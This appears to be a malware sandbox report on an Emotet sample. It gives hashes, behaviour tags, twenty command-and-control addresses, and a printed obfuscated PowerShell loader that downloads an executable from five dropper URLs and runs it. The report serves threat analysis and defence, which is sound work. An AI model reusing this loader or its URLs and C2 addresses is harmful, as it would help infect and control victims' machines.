General

  • Target

    Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.46

  • Size

    165KB

  • Sample

    191212-643d4j98xx

  • MD5

    cc7d6d8e28fce962e81a6ba5c82f29bb

  • SHA1

    c9aa3a171e86a9ddb186dcd2c092095ad4bd3df3

  • SHA256

    5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

  • SHA512

    81d6766797cb0e3e641c56dadc5cd15fa5aa1365d818f7f48ab65690264e92c11a234b077ad76559d8d24e29485e3ec27448dc155013c6f8a8d3595adf71cfb6

Malware Config

Extracted

Language
ps1
Source
1
$Ylpgdzmb='Ussbbmzhuhxke';$Lgedkkdqw = '177';$Izzqzhqztyz='Aidwjqnlcjxej';$Dbbskpwazvf=$env:userprofile+'\'+$Lgedkkdqw+'.exe';$Enhlkpqm='Ymcthcnjkuy';$Bywwmzypne=&('new'+'-o'+'bj'+'ect') NeT.WEBCLIEnT;$Fivlwlzoyuutl='http://acqua.solarcytec.com/rtsbgs/XiWmtYYur/*https://blog.learncy.net/wp-admin/user/oxZqQp/*http://hospitalsanrafael.ainimedina.com/wp-includes/vwf-i8ge-4445917/*https://sg771.kwikfunnels.com/phpmyadmin_bck/x9tfn-lv1h4-174129596/*http://www.siyinjichangjia.com/wp-content/WYszsP/'."S`PlIt"('*');$Unhcgqbmpfm='Rnfhjwbhl';foreach($Htccmlpcslkj in $Fivlwlzoyuutl){try{$Bywwmzypne."DowNlo`Adf`ILe"($Htccmlpcslkj, $Dbbskpwazvf);$Sugkuzifly='Cnjvacigqyalz';If ((&('G'+'et-Ite'+'m') $Dbbskpwazvf)."L`ENg`Th" -ge 22905) {[Diagnostics.Process]::"Sta`Rt"($Dbbskpwazvf);$Crgikwjlkq='Xhjheqdtzaa';break;$Wvtuvlrw='Tsenfeyl'}}catch{}}$Rjjptgiakk='Bfnbprpfaua'
URLs
exe.dropper

http://acqua.solarcytec.com/rtsbgs/XiWmtYYur/

exe.dropper

https://blog.learncy.net/wp-admin/user/oxZqQp/

exe.dropper

http://hospitalsanrafael.ainimedina.com/wp-includes/vwf-i8ge-4445917/

exe.dropper

https://sg771.kwikfunnels.com/phpmyadmin_bck/x9tfn-lv1h4-174129596/

exe.dropper

http://www.siyinjichangjia.com/wp-content/WYszsP/

Extracted

Family

emotet

Botnet

Epoch3

C2

190.146.14.143:443

85.235.219.74:80

78.187.204.70:80

46.105.128.215:8080

69.30.205.162:7080

192.161.190.171:8080

163.172.97.112:8080

86.98.157.3:80

113.52.135.33:7080

175.127.140.68:80

212.129.14.27:8080

200.41.121.69:443

143.95.101.72:8080

190.161.67.63:80

50.116.78.109:8080

37.46.129.215:8080

119.57.36.54:8080

212.112.113.235:80

46.105.131.68:8080

1.32.54.12:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMqZMACZDzcRXuSnj2OI8LeIYKrbUIXL
3
faUgIJPwYd305HnaBS2AfA0R+oPxT32r+3BbayI3KguqAn3E+rbwtLhqhOXOlTnY
4
7yvG4ufmwCCkRzc6Sq8baToxmd6y523AIQIDAQAB
5
-----END PUBLIC KEY-----
6

Targets

    • Target

      Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.46

    • Size

      165KB

    • MD5

      cc7d6d8e28fce962e81a6ba5c82f29bb

    • SHA1

      c9aa3a171e86a9ddb186dcd2c092095ad4bd3df3

    • SHA256

      5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

    • SHA512

      81d6766797cb0e3e641c56dadc5cd15fa5aa1365d818f7f48ab65690264e92c11a234b077ad76559d8d24e29485e3ec27448dc155013c6f8a8d3595adf71cfb6

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails

    • Executes dropped EXE

    • Windows security modification

    • Checks system information in the registry

      System information is often read in order to detect sandboxing environments.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.